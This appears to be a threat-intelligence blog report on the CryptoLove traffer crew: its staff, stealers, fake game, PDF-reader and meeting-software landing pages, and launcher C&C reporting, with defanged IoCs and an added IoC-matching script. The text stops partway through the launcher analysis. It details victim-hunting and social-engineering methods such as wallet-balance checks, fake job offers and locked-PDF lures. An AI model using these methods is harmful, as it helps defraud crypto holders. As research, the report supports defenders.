Hearts Stolen, Wallets Emptied: Insights into CryptoLove Traffer’s Team

CryptoLove is a notorious group involved in cryptocurrency scams, utilizing sophisticated methods to deceive victims and steal funds. They operate through a hierarchical structure, employing various tools and platforms to execute their scams. #CryptoScams #CyberCrime #Malware

Key points:

  • CryptoLove has been operating for over two years, specializing in crypto scams.
  • The group has a hierarchical structure with specific roles for developers, mentors, and profit handlers.
  • Workers are prohibited from scamming in CIS countries and selling logs.
  • They utilize multiple tools, including LummaC2, StealC, and Rhadamanthys for Windows, and AMOS Stealer for MacOS.
  • Communication is carried out via platforms like Discord, Telegram, and Bluesky.
  • Affiliates create fake landing pages disguised as legitimate software to lure victims.
  • Over 22,000 unique IP logs have been recorded from victims worldwide.

MITRE Techniques:

  • T1071.001 – Application Layer Protocol: The group uses Discord and Telegram for communication with victims.
  • T1071.003 – Application Layer Protocol: Workers leverage fake job postings on platforms like UpWork to lure victims.
  • T1203 – Exploitation for Client Execution: Victims are tricked into downloading malicious launchers disguised as legitimate software.
  • T1499 – Endpoint Denial of Service: The launchers can disable security software on victims’ machines.
  • T1566.001 – Spear Phishing Attachment: Scammers send PDF files that prompt victims to download malicious software.

Indicators of Compromise:

  • [domain] xilloolli.com
  • [domain] zapper.xyz
  • [url] hxxps://apikokoapi[.]com/add_code.php
  • [url] hxxps://service-government[.]com/api.php
  • [file name] TinyPatch.exe
  • Check the article for all found IoCs.
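As an added example that is not part of the original article, the following Python scanner refangs the indicators listed above and flags them in log lines; the proxy and EDR log lines, their field names, and the user and host names in them are constructed assumptions.

```python
"""Scan sample log lines for the CryptoLove indicators listed on this page.

Added example, not part of the original article. The indicator values are
the ones published above; the log lines are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Indicators exactly as listed on this page, still in defanged form.
IOCS_DEFANGED = {
    "domain": ["xilloolli.com", "zapper.xyz"],
    "url": [
        "hxxps://apikokoapi[.]com/add_code.php",
        "hxxps://service-government[.]com/api.php",
    ],
    "file name": ["TinyPatch.exe"],
}

# Constructed sample log lines (proxy and EDR style); not real telemetry.
SAMPLE_LOGS = [
    "2024-11-12T10:01:22Z proxy user=alice dst=https://service-government.com/api.php status=200",
    "2024-11-12T10:02:05Z proxy user=bob dst=https://cdn.xilloolli.com/launcher/Setup.zip status=200",
    "2024-11-12T10:03:41Z edr host=WS-17 event=process_create image=C:\\Users\\bob\\Downloads\\TinyPatch.exe",
    "2024-11-12T10:04:00Z proxy user=carol dst=https://example.com/index.html status=200",
]


def refang(value: str) -> str:
    """Undo common defanging so the indicator can be compared to live data:
    hxxp(s):// -> http(s)://, and [.] / (.) -> '.'."""
    value = re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)
    return value.replace("[.]", ".").replace("(.)", ".")


def build_index(iocs: dict) -> tuple:
    """Return (domains, urls, file_names), all lower-cased and refanged.
    Hosts of the listed URLs are added to the domain set as well, so a hit
    on another path of the same host is still surfaced."""
    domains = {d.lower() for d in iocs.get("domain", [])}
    urls = set()
    for raw in iocs.get("url", []):
        url = refang(raw).lower()
        urls.add(url)
        host = urlsplit(url).hostname
        if host:
            domains.add(host)
    files = {f.lower() for f in iocs.get("file name", [])}
    return domains, urls, files


def _token_pattern(value: str, allow_subdomains: bool) -> re.Pattern:
    """Match value as a whole host/file token, not as a substring of a
    longer name (so 'notxilloolli.com' does not hit 'xilloolli.com')."""
    prefix = r"(?:[\w-]+\.)*" if allow_subdomains else ""
    return re.compile(r"(?<![\w.-])" + prefix + re.escape(value) + r"(?![\w-]|\.\w)")


def match_line(line: str, index: tuple) -> list:
    """Return a sorted list of (kind, indicator) pairs found in one line."""
    domains, urls, files = index
    low = line.lower()
    hits = set()
    for url in urls:
        if url in low:
            hits.add(("url", url))
    for dom in domains:
        if _token_pattern(dom, allow_subdomains=True).search(low):
            hits.add(("domain", dom))
    for name in files:
        if _token_pattern(name, allow_subdomains=False).search(low):
            hits.add(("file name", name))
    return sorted(hits)


def scan(lines, iocs=IOCS_DEFANGED) -> list:
    """Return [(line_number, hits)] for every line with at least one hit."""
    index = build_index(iocs)
    results = []
    for number, line in enumerate(lines):
        hits = match_line(line, index)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOGS):
        print(f"line {number}: {SAMPLE_LOGS[number]}")
        for kind, value in hits:
            print(f"    [{kind}] {value}")
```

Subdomains of a listed domain are matched, while longer names that merely contain the indicator as a suffix are not, so a hit is worth triage rather than automatic blocking.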

This blog was written in collaboration with @g0njxa ❤ Together, we will explore the CryptoLove traffer’s team and look into their methods of operation.

Key Takeaways

  • CryptoLove is a traffer’s group specializing in crypto scams for over two years, recruiting workers to spread stealers through custom launchers and loaders that can track every stage of payload delivery.
  • CryptoLove has a hierarchical structure with roles like developers, mentors, and profit handlers.
  • Workers aren’t allowed to scam in CIS countries or sell logs.
  • Tools provided include 3+ stealers like LummaC2, StealC, and Rhadamanthys for Windows and AMOS Stealer for MacOS.
  • Workers use Discord, Telegram, and even alternative platforms like Bluesky to find victims.
  • To appear credible, workers purchase verified social media accounts (e.g., Twitter with blue checkmarks starting at $15).
  • Affiliates of CryptoLove operate dedicated landing pages often disguised as gaming platforms, PDF readers, or messaging and meeting software platforms.
  • Affiliates leverage fake NFT collections, job listings, and even fake tokens to establish trust and manipulate victims into running the launchers.
  • Over 22,000 unique IP logs have been recorded, with workers receiving payouts from funds stolen worldwide.

Case Study

The name CryptoLove might suggest a dating app, but it’s actually a traffer’s group that’s been operating for over two years and specializing in crypto scams. They are actively recruiting individuals to spread stealers through custom-written launchers, using various methods, including scams, to achieve their goals.

The CryptoLove team provides each worker with numerous affiliates, which we will cover in this blog post.

Ad poster on hacking forum

There are a few rules that the group has mentioned:

  • They don’t work in CIS countries
  • They don’t sell logs
  • AFK/Toxic/Unstable behavior is prohibited

Tools that are offered:

  • 3+ stealers (these are usually LummaC2, StealC and Rhadamanthys stealers)
  • Automatic withdrawals from victims’ cryptowallets (starting from $100, no fees to workers)
  • MacOS stealer for victims that don’t use Windows OS

Payouts:

  • Payouts range from 50% to 65%, depending on the affiliate. Top performers receive an increased percentage.

The top payouts received by workers are shown in the screenshot below.

Top payouts

RTFM

In the world of crypto scamming, victims are sometimes referred to as “mammoth” or “hairy”; the “hairy” term is likely derived from “mammoth.” These labels are part of the specific jargon used within scamming circles among native Russian speakers. Scammers, in turn, are called “workers”.

So how does it all work?

CryptoLove team calls their work NFT Scam, which they define as a type of fraud where the perpetrator gains access to internal files on the victim’s computer by infecting it with a virus.

After joining the team, users select any branch to work with, as detailed in this blog. Users can opt for several branches at once or focus on those they prefer. Each branch maintains its chat and a landing page featuring social media accounts. Notably, there is a launcher download button on the website itself; activating this launcher initiates the loading of a virus.

Once a user has selected a branch, they must familiarize themselves with the project. This involves studying the social media platforms, the website, and the available documentation. All relevant links will be provided in the pinned message of the branch’s chat. A key objective for users is to thoroughly understand the core idea of their chosen branch to competently address any questions potential victims might have about the project.

First of all, the worker needs a social media account where they can talk to the victim. The worker can purchase Twitter, Discord, Gmail, and Instagram accounts from the provided store on Telegram called Alpha Store.

Alpha Store (1)
Alpha store (2)

The worker chooses what fits their budget at the moment. The most costly is a Twitter account — starting from $15 (with a blue checkmark). A checkmark on Twitter is now mandatory; without it, they can’t write to most victims. For Discord, Telegram, and Instagram, the prices range from $1.

The examples of Twitter and Discord accounts controlled by workers are shown below.

Worker’s Twitter account (1)
Worker’s Twitter account (2)
Worker’s Twitter account (3)
Worker’s Discord account (1)
Worker’s Discord account (2)

The most relevant platforms for scamming activity at the moment are Discord and Twitter. Following the events of November 2024, traffers are aware of the rapid growth of alternative social media such as Bluesky and have started targeting users of these platforms. Bluesky has emerged as a significant counterpart to the blocked social network X, gaining substantial popularity in Brazil. The platform’s unique appeal stems from its accessibility in a region where network X faces restrictions, attracting a substantial user base, including high-profile influencers who have migrated from network X. According to one of the affiliates, “Yes, it is worth it. I found one of my profitable Brazilian contacts on Bluesky, after which I moved the conversation to Discord”. CryptoLove administration constantly informs its team affiliates about new scam opportunities following global trends and news.

Worker’s Bluesky account (1)
Worker’s Bluesky account (2)

It is a common practice to share workers’ accounts between Cryptolove users on Telegram channels to create fake engagement between them and make the accounts even more reliable.

Workers sharing their X and Bluesky accounts and requesting engagement

After purchasing an account for spamming and setting up the device from which they will be working, the worker’s next step is to find a victim with cryptocurrency (a victim from any country except the CIS). Once they find such a victim, they need to start communicating with them, whether the communication style is immediately business-like or casual on any popular topics. The outcome should be the same: their victim must visit the website of their branch and download the launcher. Before sending the victim to download the launcher, they must find out their balance so they don’t waste time. The chance that a victim has money without balance verification is like winning the lottery, according to CryptoLove. They have experienced this themselves, having made 2–3 logs daily. After 14 days of unsuccessful work, when they began to ask for the victim’s wallet address, they immediately filtered out the ones without money and did not waste time on them. When they started asking for the victim’s wallet address (for example, for salary purposes), they found themselves a victim with money, got them to download the launcher, and made a profit in 2 days.
When their victim downloads the launcher from the branch’s website (for example, for game testing, signing an employment contract, reviewing the game, getting an ID for verification, etc.), the worker will see a notification in one of the affiliates’ channels about the launcher download from the victim, and they will know by timing that this is their victim. After that, the victim launches the launcher on their device. From then on, the worker is informed about all the victim’s actions by the victim’s launcher. A launch notification comes in when the victim launches the launcher on their PC. When the victim presses any button — a notification of the press comes in. The final stage, “File Opened”, is the malware launched on the victim’s PC. This launcher feedback works only for the Windows version. There is no launch notification for MacOS — the log with data comes immediately.

Logs from Windows and MacOS launcher

With the recent updates as of November 2024, some affiliates have transitioned to using promo codes tied to individual workers. Each worker generates a unique link associated with their account and shares it with the victim. When the victim visits the page, clicks the download button, and executes the launcher, the system notifies the worker, and all logs are attributed to that specific worker.

So, the file is successfully launched. What now? The victim will receive an error in a few minutes (a special kind of error so that the victim suspects nothing :))

The worker must tell the victim it’s a temporary error, and the server is overloaded. They will contact the developer of the project and write to them later. Or, at this stage, they can refer to the possibility that the game is blocked in their country and try to find out where the victim is from.

The data will arrive in the log channel after some time, usually 5–20 minutes. The time depends on the victim’s internet speed, the size of the log, etc.

The structure of the logs:

  • number of passwords (one of the passwords/keys needed to decrypt the files of the victim’s crypto wallet)
  • number of cookies
  • wallets: number of crypto wallets

Now, the worker would have to wait while the log handler (log worker) checks the log and extracts the crypto.

The description of the status on the logs:

  • Status “Waiting for verification” — the log is under review.
  • Status “Empty” — empty wallet.
  • Status “Waiting for proofs” — the worker must submit proofs

The proofs can be the following:

  • The victim’s username
  • A screenshot showing that the worker is logged into the account from which they wrote to the victim
  • Nickname from the bot (bot Cryptolove #….) and the landing page (the website to which the worker directed the victim)

On Mac OS, the launch is slightly different; the victim would have to:

1. Open the file.

2. Right-click on the icon in the center of the opened launcher.

3. Launch by clicking OK in the pop-up window.

4. Enter the password.

The log looks roughly like this:

Logs from Windows and MacOS launchers

After the log from the victim arrives, if everything goes well, there is a password and the wallet tags in the log. Then, the worker will see the money leave the victim’s wallet. After all of the victim’s crypto assets have been successfully withdrawn, a message appears in the worker’s log channel.

The CryptoLove team and other affiliates have manuals on social engineering. Usually, the workers use the following methods to engage with the victims:

  • Discord communications: the worker looks for Discord channels on DappRadar, a platform that provides insights, analytics, and tracking services for decentralized applications (dApps) and blockchain-based projects. The worker then chooses one of the projects and navigates to their Discord channel. Next, they would message the project’s admins, holders, or users with Nitro subscriptions (since they are more likely to have money) or users with usernames ending in .eth, as their balance can often be checked via zapper.xyz, which is a decentralized finance (DeFi) and Web3 management platform that helps users track, manage, and interact with their crypto assets.
DappRadar portal

The workers can also leverage other platforms for Discord communications, for example, just a simple Google search with the terms “new crypto servers on Discord”, YouTube, Best Upcoming NFT Projects, Coinmarketcap, Coinglass, and many more.

  • Twitter communications: the worker searches for “.eth” on Twitter, picks any account, and checks their wallets on zapper.xyz. The .eth address from zapper is then copied into the CryptoLove DeBank bot or into DeBank directly to obtain the balance. Besides the “.eth” term, the workers also search for “wallet address” on Twitter. Platforms such as Coinmarketcap and Coinglass can also work for Twitter.
Wallet check on zapper.xyz
  • Telegram communications: the worker accesses cn.tgstat.com/ru/ratings/chats, which contains the list of Telegram channels. The worker would choose the Crypto channels from the categories and pick the victim to target. Again, Coinmarketcap and Coinglass can also work for Telegram.

In the past, from August 2023 to October 2023, the CryptoLove bot received notifications about new logs accompanied by screenshots from the victims. The team became highly motivated and creative, even attempting to persuade freelancers on WhatsApp, Skype, or UpWork to download and run the launcher.

The worker lured the victim on UpWork into downloading and running the launcher

There are also fake job recruitment posts on platforms such as Latium, Freelancer, and Hyve. These posts aim to lure victims into downloading and running launchers or connecting their crypto wallets to fraudulent websites. Ultimately, this gives the perpetrators control over the wallets, intending to drain the funds (Figures 12–14).

Fake job recruitment post on Latium
Fake job recruitment post on Freelancer
Fake job recruitment post on Hyve

Now we hope you have an idea of how it all works in a nutshell; let’s look at CryptoLove’s affiliates…

CryptoLove Cupids or Should We Call It Staff?

The CryptoLove team comprises a few members who are responsible for the main tasks:

  • LanRock (@lanrock_dev) — the developer for CryptoLove.
  • Routine (@RoutineLove3) — the support and “ОТРАБ” for CryptoLove, which means the person responsible for sorting out and parsing the logs. Works 12–16 hours per day.
  • SS (@sssmmmnu) — support. SS describes how he became a support for CryptoLove: “It was a very long and difficult journey, a true test of endurance, and of course, I provided substantial help to the workers and the team.”
  • Kupidon (@kup1donLove3) — support, joined CryptoLove in 2022.
  • Oscar (@magnificent_oscar) — BIG SUPPORT, the owner of Mr. Beast. Oscar has been with the team since 2022 and loves playing GTA at night, cars, and adrenaline. Before joining the scamming industry, he was a construction worker.
  • Querteo (@yellowscam) — landing page developer, the owner of SCAMQUERTEO / YELLOW EMPIRE team; one of his projects is ARGON. He brags about the first landing page he created, which had a turnover of about $30,000 in 2–3 months.
  • Pink (@PinkorexxLove3) — mentor, previously participated in cold calling (social engineering calls) and was brought into the CryptoLove team by her ex-boyfriend, who wanted to steal money from her. Before entering the scamming industry, she worked for her parents in the real estate industry and then as a freelance translator. Pink currently lives in Israel.
  • Xamster (@sup_xam) — mentor, support. Prior to joining CryptoLove, he participated in airdrops with his previous team and got whitelists (In the context of cryptocurrency, NFTs, or other online projects, whitelists (WL) refer to exclusive pre-approval or access lists that allow individuals to participate in an event or claim rewards). Airdrops in the context of cryptocurrency refer to the distribution of free tokens or coins to users as part of a marketing campaign or blockchain project launch. In the scamming industry, airdrops are fraudulent schemes. Workers promise free cryptocurrency tokens to lure victims into providing sensitive information, such as private keys, or to send a “fee” to claim the fake reward.
  • MxDuke (@mrxuyux) — the top profit maker on CryptoLove and the Profit Team owner. The most significant profit was over a year ago, around $55,000. MxDuke says, “When I saw the money starting to move out of the wallet, I was just in shock. While the wallets were being emptied, I smoked half a pack of cigarettes, but then I started feeling nervous, thinking they’d come after me any second. Oscar helped clean the money, though, and after a week, I calmed down — until then, I was a nervous wreck. The target was easy to hook, with just three SMS messages. As for the money, I withdrew a small portion in cash for personal needs, put some into developing “Orbit,” and left the rest sitting in crypto” (Orbit is the landing page or project on Profit Team).

The messages the workers usually send to the victim would look like the ones shown in the screenshots below.

Hiring victims into the crypto projects:

Crypto project hire (1)
Crypto project hire (2)

Hiring for beta testing:

Beta testing hire (1)
Beta testing hire (2)

CryptoLove Landing Pages and Affiliates

Each affiliate has multiple landing pages that users can use for scamming purposes. These landing pages contain the download links for launchers based on the user’s operating system. The landing pages can be anything from fake Zoom installers to PDF Readers. In this section, we will cover some of the landing pages CryptoLove affiliates use.

Landing Pages and Affiliates

SCAMQUERTEO TEAM or YELLOW EMPIRE

Yellow Empire affiliate banner

The affiliate has a turnover of $650,957.20.

This affiliate has had the following landing pages in the past:

  • FATO (PDF LAND) — fake PDF reader
  • ZOOM LAND
  • GOOGLE MEET LAND
  • ARGON GAME 2.0 — gaming landing page

Note: “LAND” stands for a landing page.

Fato Reader landing page

Examples of the download chains are shown below. The data sent to the server includes terms related to crypto wallets, such as “metamask” and “phantom”, which suggests a default configuration, as some of the landing pages may contain wallet drainers: malicious tools designed to transfer funds from a user’s wallet to a worker’s account without authorization.

Payload download chain from the landing page (1)
Payload download chain from the landing page from the most recent update (2)

For some landing pages, the user has to generate a personal link to the landing page from one of the Telegram bots, such as the Zoom and Google Meet landing pages.

Google Meet landing page

This CryptoLove affiliate also provided a fake Zoom landing page, but at the time of writing this report, this landing page has been taken down, along with the Google Meet one.

Zoom logs
Google Meet logs

At one point, the Google Meet landing page prompted the victim for permission to access the device’s camera and take a photo. The captured face images have been blurred for privacy purposes.

Victim’s pictures

In addition to using fake PDF readers, Zoom, and Google Meet landing pages, CryptoLove affiliates, including YELLOW EMPIRE, also employ gaming-themed landing pages such as Argon 2.0, also known as Genom. Workers can lure the victims into being beta testers of the game, for example.

Argon 2.0
Announcement of Argon 2.0

Translation of Argon 2.0 announcement:

ARGON 2.0

We’ve all been waiting for this for so long, and now the day has come! I’m thrilled to present ARGON LAND 2.0 (GENOM).

What have we done?

We’ve redesigned the website and changed its functionality. Additionally, a lot of new features have been added, which you’ll see soon.

What’s coming next?

As a teaser, I’ll say this: right after ARGON 2.0 is launched, we’ll start working on creating more features. For example:

– Bot functionality: Bots will handle everything on their own.

– Launcher development: The launcher for landing pages is already in progress and will be ready soon.

– Game trailer: The game trailer will also be ready in the coming days.

Broker Panel

This event introduces a new tool called the “Broker Panel”. With it, you’ll be able to track your profits, landing pages, social media, and much more. Also, suggestions for additional functionality are welcome!

Onwards to new profits and adventures!

Even the name of the Argon project founded by CryptoLove in 2023 is present in the new Genom website as a reminder to CryptoLove workers.

Genom 2.0 referencing Argon project

The logs (otstuk) from Genom / Argon 2.0 launchers are shown below.

Genom logs

The affiliate uses a bot capable of generating and sending fake BNB tokens to the profile created by the user on the Genom/Argon 2.0 platform. The goal is to make the user feel invested and excited enough to run the malicious launcher.

The account on Genom with fake tokens sent from the affiliate bot

The affiliates invest significant time in creating these landing pages, managing social media accounts, and promoting them; they even have their own cute NFTs, as shown below.

Linktr page of Genom
Genom’s NFTs on Rarible

Interestingly enough, the affiliate has previously registered the company on Companies House services as Genom LTD, which was later changed to DRAGONBORN LTD.

Registered company GENOM LTD on Companies House
Registered company GENOM LTD (changed to DRAGONBORN LTD) on Companies House

Please note that Dragonborn is another scam project under CryptoLove managed by affiliate Mr. Beast Team.

Wolfs of Wall Street Team

Wolfs of Wall Street affiliate banner

The affiliate has a turnover of $300,270.

The Wolves of Wall Street currently has two main projects: gaming landing pages with social media profiles (Orionix and Dinoverse). The affiliate is planning a rebranding soon.

How Wolves of Wall Street advertises the Dinoverse project:

  • The Dinoverse project features a fantastic metaverse with its merchandise, real documents, and official registration in the UK.
  • The project offers a wealth of top-notch and unique materials, including NDAs, custom designs, and more.
  • It has UK licenses with engravings and authentic holographic DocSecure.
  • Highly promoted social media (Twitter with a Gold Checkmark, Discord, Link3, Linktr, Medium, Telegram, YouTube, OpenSea, and more).

Dinoverse landing page with a gaming theme

The logs from Dinoverse launchers are shown below.

Dinoverse logs
Dinoverse registered as UNI LTD

It is also registered as a business in Georgia (United States) and as UNI Enterprise, LLC, as shown below.

Dinoverse photo of printed business license provided to the workers
Dinoverse registered as UNI Enterprise, LLC.

The Dinoverse administration also created its merchandising and shared a real-life photo shoot to give credibility to the project.

Examples of Dinoverse’s merchandising photoshoot in an underground parking

Below is the Linktr for the Dinoverse project.

Dinoverse linktr.ee

Orionix project:

  • The Orionix project is a gaming landing page with a space theme.
  • The project includes extensive materials, including a Discord channel.

Orionix landing page with the gaming theme

The logs from Orionix launchers are shown below.

Orionix logs

The Orionix affiliate claims the business is registered in Florida, United States. However, the document provided is fake.

Fake Orionix registration printed document picture given to workers

The administration behind Orionix made a photo shoot using its merchandising to gain credibility with users.

Examples of Orionix merchandising photoshoot in a professional studio

Below is the Linktr for the Orionix project.

Linktr for the Orionix project

Please note that both fake gaming landing pages created by Wolves of Wall Street serve no purpose but to provide a fake download button, which delivers the malware launcher for CryptoLove.

Additionally, this group operates two landing pages that impersonate video-meeting software, such as Zoom and WeChat. Each user can generate a personalized page under a shared domain linked to their Telegram username through a team-managed bot. These pages are designed to trick users into downloading the launcher.

Zoom landing page
WeChat landing page

At the time of writing this blog, both fake meeting software landing pages had been taken down.

Another landing provided by Wolves of Wall Street is a suite of web3 browser-based tools named “Toffee”, which is promoted on three websites:

Crypto Tools — Here, you’ll find all crypto applications, exchanges, wallets, services, token sales, marketplaces, AI services — all brought together into one powerful crypto tool that’s incredibly convenient for anyone navigating the crypto world!

Landing page of Toffee project (1)

Crypto Calendar — Here, you’ll find all crypto applications, exchanges, wallets, services, token sales, marketplaces, and AI services — all combined into a comprehensive crypto tool that’s super convenient for anyone in the crypto space!

Landing page of Toffee project (2)

The promotion from the affiliate for Crypto Research / Toffee Research:

Here, you’ll find all the latest news, media leaks, flashes, and micro-updates from the cryptocurrency world — covering everything from no-name projects to top-tier ones. For example, a mammoth might want to track the NN project and set up notifications for any media leaks to decide when to buy or sell the project’s tokens. Yes, it’s super convenient and, once again, a great hook!

Welcome!

Landing page of Toffee project (3)

Like all landing pages of this team, the Toffee suite has no other functionality than serving the launcher.

Toffee logs

PROFIT (ПРОФИТНЫЕ) Team

PROFIT Team affiliate banner

The affiliate has a turnover of $966,542.00.

Currently, the PROFIT Team is working on its leading projects, both gaming-themed landing pages: Whales Project and Orbit Project. This affiliate has the following landing pages.

Whales Project landing page

Users can either download the fake game (launcher) directly or create an account on the site, where, like on the Genom / Argon 2.0 landing page from Yellow Empire, the Profit team worker can send fake tokens to the victim’s account through a bot to make the project appear trustworthy.

Website fake wallet

Cosmo Whales has its own company registered at Companies House.

Whales Project registered as Cosmo Whales

The affiliates of this team also created an NFT collection for this project.

Whales Project NFT collection in OKX

The Orbit project is also a fake game landing page, inspired by WarUniverse: Orbit of Cosmos, an MMO game about space.

Orbit landing page

This landing does not work as well as Cosmo Whales because the website only provides a download button, and the gameplay featured on the website is just stolen clips from videos of the gaming YouTuber “MrZarokk”.

Even MxDuke, a staff member of the PROFIT Team, is included on the website as the founder of the Orbit Unit game and an “experienced blockchain and DeFi specialist.”

Orbit “staff”

And the last landing provided by the Profit team is a fake PDF Reader named VeriScroll. In the past, it was known as Verdascript.

PDF Reader landing page

The profit team has a general channel for logs for all three landings:

PROFIT affiliate logs

Heaven Era 2.0 Team

The affiliate has a turnover of $535,334.

This affiliate had the following landing pages in the past:

  • CRYPTIC CAVE (WEB3 GAME LAND)
  • LINKUP (MEETING SOFTWARE LAND)

Cryptic Cave landing page

This game was also listed on the Magic Square web3 app store, introduced as “a unique RPG where you become a young adventurer stranded on a mysterious island!”.

Cryptic Cave listing announcement

The logs from Cryptic Cave launchers are shown below.

Cryptic Cave logs

The LinkUp landing features a fake meeting software, as shown below.

Linkup meeting software landing page
Linkup logs

Mr. Beast Team

Mr. Beast affiliate banner

The affiliate has a turnover of $31,680.

This affiliate has had the following landing pages in the past:

  • DRAGONBORN (WEB3 GAME LAND)
  • DOCULUMA (PDF READER LAND)

The Dragonborn Landing page features a fake game about dragons, as shown below.

Dragonborn landing page

As shown below, Dragonborn claims to partner with some companies, such as Vespertine Capital, HUBGlobal, or RedHat.

Dragonborn fake partnership announcement with software giant RedHat

Dragonborn also falsely claims to be managed by Steven Wolfe Pereira, a Chief Client Officer for TelevisaUnivision’s U.S. Advertising Sales, using his image without authorization.

Dragonborn fake staff

This landing page has also created the Dragonborn token ($DBT), which is available and already flagged on PancakeSwap. Additionally, the token is highlighted on the website as a fake token labeled vDBT.

Dragonborn token swap

This landing page offers users a direct download option and the ability to create an account by connecting their MetaMask wallet. By connecting to the site, users can access features such as a messaging system for communication between Dragonborn users, a fake NFT inventory, a fake job advertisement section (where users can apply by submitting their full name, country, email, and CV document), and a ticketing system for reporting issues.

Dragonborn profile for connected users
Dragonborn careers page

For team affiliates, a custom administration panel called AdminDragon was developed by CryptoLove’s developer, Lanrock. It is a fork of AdminLTE 4.0.0-beta2. Credentials for accessing this administration panel are generated through a team-managed bot.

Dragonborn admin panel
Dragonborn NFT sent to the profile inventory
Dragonborn victim ticket replied by an unknown affiliate

It is possible to send a fake amount of vDBT to any user connected to the website and to send HTML code to their profile due to poor request sanitization.

Dragonborn landing page

So, we sent some love to CryptoLove users on the website too, nothing special …

Message to CryptoLove

According to Mr. Beast’s administration, the AdminDragon panel includes an option to drain connected user wallets by activating them with a button. Once activated, the user must swap the received vDBT tokens to their preferred cryptocurrency on the landing page using the connected wallet. This action is assumed to trigger the drainer. The drainer reportedly used for these operations is allegedly known as Angel Drainer.

Dragonborn victims IDs

At the time of writing this blog, there are allegedly 258 users with connected wallets. These wallets can be viewed in the Mr. Beast log channels. Whether the draining functionality was operational at the time of writing is unclear, and there is no record of any successful draining in the Mr. Beast draining log channels. Therefore, the functionality of this feature could not be confirmed.

Workers of the Mr. Beast Team can request a custom corporate email (@dragonborn.org) from the affiliate in order to carry out their scamming activities in a more professional way and make the victim believe that the project is a legitimate one. Communications with victims may also be carried out through these corporate emails, avoiding suspicion. The mail service being used is VK Workmail (from mail.ru).

Emails created by Mr Beast Affiliates to their workers

The logs of Dragonborn are shown below.

Dragonborn logs

The other landing provided by Mr. Beast is a fake PDF Reader named Doculuma.

Doculuma PDF Reader Landing Page

As with other PDF Reader landings provided by CryptoLove affiliates, the most common way to get users to download this fake software is to send them a PDF file containing a lock banner that points to the PDF Reader.

How the affiliate would describe the process of luring victims into downloading the launcher via the PDF reader:

The PDF file is not a launcher. It’s an encrypted PDF file, and when opened, the mammoth (target user) sees the following:

  • For the mammoth to supposedly open this PDF file, he must install a PDF reader. Logically, the mammoth types the query into Google (for example, the query, the name of our site is different): “verdascript” — “verdascript pdfreader” and so on, and sees this picture.
Results from the Google search

Mr. Beast’s manual on how to work with it:

1. You can introduce yourself as always, as an employee of one of our landing pages, and instead of guiding him into the channel in Discord, you ask questions, introduce him to the project, and then ask if he's ready to sign the contract; then you can send him the launcher.

2. It is the same as the first method, but instead of sending the PDF file to the mammoth via Discord/Twitter/Telegram, you ask him for his email and tell him you'll send him the employment contract. Write to support or the branch owner that you need the corporate email, and from there, you send the file. The mammoth sees that you are an employee because you have the project's corporate email, and the trust level increases.

Fake Doculuma PDF that is presumably protected

ObmanVALUT Team

The affiliate currently has a turnover of $77,404.

This affiliate features a fake meeting software named “NexCall”.

Nexcall landing page

The affiliates of this team can provide their workers with a corporate email (@nexcall.us), similar to Dragonborn described previously.

Emails created by ObmanValut affiliate for their workers

The logs of Nexcall are shown below.

NexCall logs

CAPS LANDS Team

CAPS LAND Affiliate

The affiliate has a turnover of $10,774.

This affiliate has the following landing pages:

  • CAPSURE LABS (WEB3 SOFTWARE LAND)
CapsureLabs landing page

The landing page serves the launchers via the promo codes workers provide to the victims.

CapsureLabs landing page

Upcoming landings

In November 2024, the CryptoLove Team added two more affiliates: Untitled Team and XMAS Team. The XMAS Team was previously part of Marko Polo's traffer team, which recently shut down after its coder stole 2.5 million dollars' worth of GIGA memecoin tokens from a macOS log that the Marko Polo staff's automatic checker failed to detect. The XMAS Team and its workers had been active under the Marko Polo group for several months, operating as its affiliate with the landing pages "Galaxy" and "MOW", which could not be attributed to any source at the time of writing. While they adapt to the new CryptoLove administration, the landings this team will offer remain unknown.

Untitled Team offers a forum at xona[.]gg, a copy-paste of the kingz[.]net forum. The team's staff are actively developing this landing and have shared how they intend it to work.

Xona landing page

While this is a fully operational forum, affiliates of the Untitled Team have two methods for tricking victims into downloading malware. The first is a direct download of the forum's XCLIENT launcher, a customized variant of the CryptoLove launcher. Victims are deceived into believing that the code they enter into the launcher is a 2FA authentication code (the developer made a typo on the landing page to enable the authentication); in reality, it is the personal invite code of the CryptoLove worker. At the time of writing, this functionality is still under development.

Xona download page

The second method introduces a simulated calling feature in the forum's user messaging system. When one user attempts to call another, a fabricated notification claims there is an issue with their microphone, and the suggested fix prompts them to download "driver updates", which is in fact the CryptoLove launcher. This feature is still in development and currently redirects users to the XCLIENT download page mentioned above.

Xona messaging page

The affiliates of this team have also created a Telegram mini-app that displays the Xona forum and will let the users use the forum directly inside Telegram.

Xona mini app hosted on Xona´s Telegram bot

CryptoLove Launchers

Note: At the time of writing, the launchers drop Rhadamanthys and StealC for Windows and AMOS Stealer for macOS. Configuration extractors for StealC and the newest AMOS version are in the TRACLabs Config_extractors repository listed in the References.

Before analyzing the launchers, it's worth noting that we successfully reported the EV code-signing certificates used to sign the malicious launchers, including:

  • Chengdu Yihui Weimeng Network Technology Co., Ltd (Thumbprint: 7EB4CA2952EB958E894D4AC48971BA930F22D29F)
  • Shenzhen Xinshitong Network Technology Co., Ltd (Thumbprint: 8F44A139359DDB9310C681526C560F207B706115)

CryptoLove was using MSIX for the launchers at some point around October 2024 and then switched back to executables.

In September 2024, CryptoLove was using launchers that were not bundled. On execution, the launcher calls sendstart(). sendstart() and the related functions sendclick() and sendclick1() are how the launcher reports events and user interactions back to the command and control (C&C) server; sendclick2() is also implemented in the binary but unused.

The sendstart() method reports a launch event to a remote server, hxxp://xilloolli[.]com/api.php. The POST request is built from:

  • The base URL above.
  • status=1, the event type (here, a launch).
  • wallets=, filled by MainWindow.Wallets() with the numeric IDs of the wallet browser extensions detected on the victim's machine (a comma-separated list, or 0 if none).
  • av=, filled by MainWindow.GetAntivirus() with the numeric IDs of the antivirus products installed. GetAntivirus() identifies installed products by querying the WMI (Windows Management Instrumentation) class AntivirusProduct in the root\SecurityCenter2 namespace; if, for example, both Windows Defender (ID 1) and Kaspersky Total Security (ID 2) are found, it returns "1,2".
Method that retrieves cryptowallets on the victim’s machine

The list of wallets being enumerated:

  • MetaMask: fhbohimaelbohpjbbldcngcnapndodjp
  • Phantom Wallet: aeachknmefphepccionboohckonoeemg
  • Binance Chain Wallet: hnfanknocfeofbddgcijnmhnfnkdnaad
